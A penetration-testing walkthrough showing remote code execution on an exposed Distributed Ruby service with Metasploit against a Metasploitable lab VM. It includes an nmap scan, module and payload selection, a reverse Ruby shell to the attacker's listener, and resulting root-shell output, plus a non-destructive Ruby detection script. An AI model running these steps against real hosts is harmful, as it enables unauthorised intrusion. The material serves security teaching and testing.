Remote Code Execution on Distributed Ruby with Metasploit

Day after day, developers and users settle into the same habits, and those habits are usually the easiest thing for an attacker to pick as a target and a way in.
Whenever we build a product we end up trading convenience against security.
Distributed Ruby shows exactly that trade-off, and it is why Metasploit can test a dRuby service with so little effort.

What is Distributed Ruby?

First, what does "distributed" mean? When one computer does not have enough computing power and a supercomputer is not an option, the computation and the data are spread across many machines so that, added together, they behave like one.
Distributed Ruby (dRuby, the drb library that ships with Ruby) is the distributed object system for the Ruby language: it lets one Ruby process call methods on objects that live in another process.
That flexibility is useful for extending a program with remote services, but a dRuby server exposed without care is a security hole. The server forwards any public method call a client sends to the exported object, including instance_eval, so a dRuby port an attacker can reach amounts to arbitrary code execution as the user running the service.

0x01 Test environment

The write-up describes both the attacking machine and the target as ParrotSecurityOS, with
IP: 172.16.1.102
RubyVersion: ruby 2.0.0p648 (2015-12-16) [x86_64-linux]
The captures that follow do not match that description, however: nmap reports Ruby 1.8 on the target, and the uname output at the end shows a Metasploitable host on a 2.6.24 i686 kernel. Read 172.16.1.102 as the target; the Ruby 2.0.0 line most likely describes the attacking machine, whose own address, set as LHOST later, is 172.16.1.100.

0x02 Verifying the vulnerability

Run dRuby on the target. When a dRuby service starts it binds itself to a specific URI and port; for this demonstration that port is 8787, which is also the default RPORT of the Metasploit module, so Nmap can find it without a full port sweep.
Use nmap -sV against the target on port 8787 to identify the service and version running there:

nmap -sV 172.16.1.102 -p 8787

[*] exec: nmap -sV 172.16.1.102 -p 8787

Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-25 18:16 CST
Nmap scan report for 172.16.1.102
Host is up (0.0013s latency).

PORT     STATE SERVICE VERSION
8787/tcp open  drb     Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
MAC Address: 08:00:27:77:62:6C (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.65 seconds

The banner confirms a dRuby service is up. Note how much it already gives away: the Ruby major version (1.8) and the library path /usr/lib/ruby/1.8/drb, both disclosed by the server itself before we have sent it anything harmful. Next we turn to Metasploit.
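The Metasploit module's info output further down states Check supported: No, so it cannot confirm the exposure without firing the exploit. The following added example (not from the original article, Nmap or Metasploit) is a non-destructive check written against the drb library: it speaks the dRuby protocol, asks the exported object for its public method list, and reports whether a code-execution method is reachable. Nothing is evaluated on the target; public_methods is a plain query. The method list, the demo server and the timeout are the author's own choices. Point it at druby://172.16.1.102:8787 or any other URI on the command line; with no argument it checks a throwaway server of its own.

```ruby
require 'drb/drb'
require 'timeout'

# Public methods that hand a remote caller arbitrary code execution on the
# exported object. DRb only refuses private/protected methods and __send__,
# so any of these being public means the service is exploitable.
CODE_EXEC_METHODS = %i[instance_eval instance_exec send public_send].freeze

# Non-destructive check against one dRuby URI. Returns a hash that says whether
# the service answered the protocol at all and which dangerous methods it exposes.
def drb_check(uri, timeout: 5)
  proxy = DRb::DRbObject.new_with_uri(uri)
  # Methods defined on the local proxy would be answered locally, so route the
  # call through method_missing to make sure it travels to the server.
  names = Timeout.timeout(timeout) { proxy.send(:method_missing, :public_methods) }
  names = Array(names).map(&:to_sym)   # Ruby 1.8 servers answer with strings
  exposed = CODE_EXEC_METHODS & names
  {
    reachable: true,
    public_methods: names.size,
    exposed: exposed,
    vulnerable: !exposed.empty?
  }
rescue StandardError => e
  # Connection refused, an ACL dropping us, a non-DRb listener returning
  # garbage instead of a marshalled reply, or no answer within the timeout.
  { reachable: false, vulnerable: false, error: "#{e.class}: #{e.message}" }
end

# Throwaway target for the usage below (constructed; not the page's target).
# A bare Object already exposes every method in CODE_EXEC_METHODS.
def start_demo_server(front = Object.new)
  DRb::DRbServer.new('druby://127.0.0.1:0', front)
end

if __FILE__ == $0
  uri = ARGV[0]
  server = nil
  unless uri
    server = start_demo_server
    uri = server.uri
  end
  p drb_check(uri)
  server.stop_service if server
end
```

Treat a vulnerable: true result as equivalent to what the exploit below achieves; the only difference is that no code has run on the target yet. A reachable: false result with an error mentioning "connection closed" right after a successful TCP connect is the signature of an ACL dropping the peer.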

0x03 Exploitation

Start Metasploit with msfconsole in a terminal, then run search drb to list every matching module:

msf > search drb

Matching Modules
================

   Name                                                   Disclosure Date  Rank       Check  Description
   ----                                                   ---------------  ----       -----  -----------
   exploit/linux/misc/drb_remote_codeexec                 2011-03-23       excellent  No     Distributed Ruby Remote Code Execution
   exploit/multi/misc/wireshark_lwres_getaddrbyname       2010-01-27       great      No     Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow
   exploit/multi/misc/wireshark_lwres_getaddrbyname_loop  2010-01-27       great      No     Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow (loop)

drb_remote_codeexec is the one we want; the two Wireshark entries only match because their names contain the same substring. Load it with use followed by the module path, then info shows its targets, options and references (note Check supported: No, so the module cannot confirm the vulnerability without actually firing the exploit):

msf > use exploit/linux/misc/drb_remote_codeexec
msf exploit(linux/misc/drb_remote_codeexec) > info

       Name: Distributed Ruby Remote Code Execution
     Module: exploit/linux/misc/drb_remote_codeexec
   Platform: Unix
       Arch: cmd
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2011-03-23

Provided by:
  joernchen <joernchen@phenoelit.de>

Available targets:
  Id  Name
  --  ----
  0   Automatic
  1   Trap
  2   Eval
  3   Syscall

Check supported:
  No

Basic options:
  Name   Current Setting  Required  Description
  ----   ---------------  --------  -----------
  RHOST                   no        The target address
  RPORT  8787             yes       The target port
  URI                     no        The URI of the target host (druby://host:port) (overrides RHOST/RPORT)

Payload information:
  Space: 32768

Description:
  This module exploits remote code execution vulnerabilities in dRuby.

References:
  CVE: Not available
  http://www.ruby-doc.org/stdlib-1.9.3/libdoc/drb/rdoc/DRb.html
  http://blog.recurity-labs.com/archives/2011/05/12/druby_for_penetration_testers/
  http://bugkraut.de/posts/tainting

0x04 Launching the exploit
Set the target IP. The port can stay at its default of 8787, which matches what Nmap found. Then list the compatible payloads:

msf exploit(linux/misc/drb_remote_codeexec) > set rhost 172.16.1.102
rhost => 172.16.1.102
msf exploit(linux/misc/drb_remote_codeexec) > show payloads

Compatible Payloads
===================

   Name                                Disclosure Date  Rank    Check  Description
   ----                                ---------------  ----    -----  -----------
   cmd/unix/bind_awk                                    normal  No     Unix Command Shell, Bind TCP (via AWK)
   cmd/unix/bind_busybox_telnetd                        normal  No     Unix Command Shell, Bind TCP (via BusyBox telnetd)
   cmd/unix/bind_lua                                    normal  No     Unix Command Shell, Bind TCP (via Lua)
   cmd/unix/bind_netcat                                 normal  No     Unix Command Shell, Bind TCP (via netcat)
   cmd/unix/bind_netcat_gaping                          normal  No     Unix Command Shell, Bind TCP (via netcat -e)
   cmd/unix/bind_netcat_gaping_ipv6                     normal  No     Unix Command Shell, Bind TCP (via netcat -e) IPv6
   cmd/unix/bind_nodejs                                 normal  No     Unix Command Shell, Bind TCP (via nodejs)
   cmd/unix/bind_perl                                   normal  No     Unix Command Shell, Bind TCP (via Perl)
   cmd/unix/bind_perl_ipv6                              normal  No     Unix Command Shell, Bind TCP (via perl) IPv6
   cmd/unix/bind_r                                      normal  No     Unix Command Shell, Bind TCP (via R)
   cmd/unix/bind_ruby                                   normal  No     Unix Command Shell, Bind TCP (via Ruby)
   cmd/unix/bind_ruby_ipv6                              normal  No     Unix Command Shell, Bind TCP (via Ruby) IPv6
   cmd/unix/bind_socat_udp                              normal  No     Unix Command Shell, Bind UDP (via socat)
   cmd/unix/bind_stub                                   normal  No     Unix Command Shell, Bind TCP (stub)
   cmd/unix/bind_zsh                                    normal  No     Unix Command Shell, Bind TCP (via Zsh)
   cmd/unix/generic                                     normal  No     Unix Command, Generic Command Execution
   cmd/unix/reverse                                     normal  No     Unix Command Shell, Double Reverse TCP (telnet)
   cmd/unix/reverse_awk                                 normal  No     Unix Command Shell, Reverse TCP (via AWK)
   cmd/unix/reverse_bash                                normal  No     Unix Command Shell, Reverse TCP (/dev/tcp)
   cmd/unix/reverse_bash_telnet_ssl                     normal  No     Unix Command Shell, Reverse TCP SSL (telnet)
   cmd/unix/reverse_ksh                                 normal  No     Unix Command Shell, Reverse TCP (via Ksh)
   cmd/unix/reverse_lua                                 normal  No     Unix Command Shell, Reverse TCP (via Lua)
   cmd/unix/reverse_ncat_ssl                            normal  No     Unix Command Shell, Reverse TCP (via ncat)
   cmd/unix/reverse_netcat                              normal  No     Unix Command Shell, Reverse TCP (via netcat)
   cmd/unix/reverse_netcat_gaping                       normal  No     Unix Command Shell, Reverse TCP (via netcat -e)
   cmd/unix/reverse_nodejs                              normal  No     Unix Command Shell, Reverse TCP (via nodejs)
   cmd/unix/reverse_openssl                             normal  No     Unix Command Shell, Double Reverse TCP SSL (openssl)
   cmd/unix/reverse_perl                                normal  No     Unix Command Shell, Reverse TCP (via Perl)
   cmd/unix/reverse_perl_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via perl)
   cmd/unix/reverse_php_ssl                             normal  No     Unix Command Shell, Reverse TCP SSL (via php)
   cmd/unix/reverse_python                              normal  No     Unix Command Shell, Reverse TCP (via Python)
   cmd/unix/reverse_python_ssl                          normal  No     Unix Command Shell, Reverse TCP SSL (via python)
   cmd/unix/reverse_r                                   normal  No     Unix Command Shell, Reverse TCP (via R)
   cmd/unix/reverse_ruby                                normal  No     Unix Command Shell, Reverse TCP (via Ruby)
   cmd/unix/reverse_ruby_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via Ruby)
   cmd/unix/reverse_socat_udp                           normal  No     Unix Command Shell, Reverse UDP (via socat)
   cmd/unix/reverse_ssl_double_telnet                   normal  No     Unix Command Shell, Double Reverse TCP SSL (telnet)
   cmd/unix/reverse_stub                                normal  No     Unix Command Shell, Reverse TCP (stub)
   cmd/unix/reverse_zsh                                 normal  No     Unix Command Shell, Reverse TCP (via Zsh)
   generic/custom                                       normal  No     Custom Payload
   generic/shell_bind_tcp                               normal  No     Generic Command Shell, Bind TCP Inline
   generic/shell_reverse_tcp                            normal  No     Generic Command Shell, Reverse TCP Inline

We choose cmd/unix/reverse_ruby: this is a command-line payload, so it needs an interpreter on the target, and a host running dRuby is guaranteed to have Ruby.

msf exploit(linux/misc/drb_remote_codeexec) > set payload cmd/unix/reverse_ruby
payload => cmd/unix/reverse_ruby
msf exploit(linux/misc/drb_remote_codeexec) > options

Module options (exploit/linux/misc/drb_remote_codeexec):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  172.16.1.102     no        The target address
   RPORT  8787             yes       The target port
   URI                     no        The URI of the target host (druby://host:port) (overrides RHOST/RPORT)

Payload options (cmd/unix/reverse_ruby):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

Set the listener address to the attacking machine's own IP (LPORT stays at its default of 4444):

msf exploit(linux/misc/drb_remote_codeexec) > set lhost 172.16.1.100

lhost => 172.16.1.100

0x05 Getting a shell
Now run the module. The Automatic target tries the exploitation methods in turn: here the instance_eval method is reported as not working on this host, and the syscall method succeeds by execve'ing a temporary file (.JU4AK4Gh3sOBkaB7) that the module then deletes. The resulting shell is root, because dRuby executes whatever it is asked as the user who started the service; that user's privileges are exactly what the open port exposes.

msf exploit(linux/misc/drb_remote_codeexec) > run

[*] Started reverse TCP handler on 172.16.1.100:4444
[*] Trying to exploit instance_eval method
[!] Target is not vulnerable to instance_eval method
[*] Trying to exploit syscall method
[*] attempting x86 execve of .JU4AK4Gh3sOBkaB7
[+] Deleted .JU4AK4Gh3sOBkaB7

whoami
root
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
ip address
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
    link/ether 08:00:27:77:62:6c brd ff:ff:ff:ff:ff:ff
    inet 172.16.1.102/12 brd 172.31.255.255 scope global eth0
    inet6 fe80::a00:27ff:fe77:626c/64 scope link
       valid_lft forever preferred_lft forever